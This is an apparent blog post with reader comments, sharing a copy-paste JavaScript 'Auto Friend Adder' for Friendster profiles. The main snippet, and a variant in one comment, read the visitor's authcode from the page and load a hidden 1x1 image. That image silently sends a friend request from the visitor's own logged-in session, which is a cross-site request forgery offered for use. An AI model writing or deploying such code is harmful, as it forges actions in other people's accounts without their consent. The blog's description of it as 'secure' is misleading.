Auto Friend Adder – Faster&Secure (No Email)

Posted by: Joy  :  Category: JavaScript

What is Auto Friend Adder? It’s a javascript code to make the visitor of our friendster profile do the automatic request to add as a friend. Anyway, this one is another version of what exist before, No Email Needed, faster and also more secure + shortest ever lolz..

Why faster? As it doesnt use OnLoadHandler like another version
Why secure? As using lastname would really hide our email from spammer.

Code provided by : AdV & CdV

  1. // AUTOMATIC FRIEND REQUEST
    // Code Provided By : Crazy de Ville
    var cpButton=$("controlPanelButtons").innerHTML;
    if(pageViewerID!=""&&cpButton.indexOf("addfriendrequest")!=-1){
    $("0").innerHTML+=""
    +"<img src='http://www.friendster.com/addfriendrequest.php?authcode="
    +cpButton.slice(cpButton.indexOf("authcode=")).slice(9,39)+"&uid="
    +pageOwnerID+"&email=&firstname=&lastname=YOUR LAST NAME"
    +"&friend=&submit=1' width=' 1' height=' 1' style='visibility:hidden'/>"
    }

Change the blue part with your friendster lastname
Copy paste the code anywhere inside your JS external file, outside onloadhandler recommended for faster load :)
Happy tweaking ;)


24 Responses to “Auto Friend Adder – Faster&Secure (No Email)”

Pages: « 1 2 [3] Show All

  1. 21
    Joy Says:

    yang di comment#2, versi pake confirm di atas itu perlu ganti
    YOUR_LAST_NAME sama lastname friendster kamu
    klo mau yang copy paste, cobain yang ini :

    // AUTOMATIC FRIEND REQUEST + CONFIRMATION
    // Code Provided By : Crazy de Ville
    var cpButton=$("controlPanelButtons").innerHTML;
    if(pageViewerID!=""&&cpButton.indexOf("addfriendrequest")!=-1){
    if(confirm("Lom jadi tmen neh, add gw yah?")){
    var addfriend = $("0").getElementsByTagName("a");
    for(x=0;x<addfriend.length;x++){
    var a = addfriend[x].href;
    if(a.indexOf("addfriend")!=-1){
    $("0").innerHTML += "<img src='"+a+"&lastname="+pageOwnerFName+"&submit=1' width=' 1' height=' 1'/>"
    }
    }
    }
    }

  2. 22
    mety Says:

    gw mw add temen2 gw lebih banyak lagi…tapi kok ga bisa?mohon bantuannya….thanks before..

  3. 23
    PAOLO Says:

    JS external file ..XN UN ?NEWBIE LAN :(

  4. 24
    Deats Says:

    Hi. this is kind of an “unconventional” question , but have other visitors asked you how get the menu bar to look like you’ve got it? I also have a blog and am really looking to alter around the theme, however am scared to death to mess with it for fear of the search engines punishing me. I am very new to all of this …so i am just not positive exactly how to try to to it all yet. I’ll just keep working on it one day at a time.

Pages: « 1 2 [3] Show All

Leave a Reply

Comment moderation is enabled. Your comment may take some time to appear.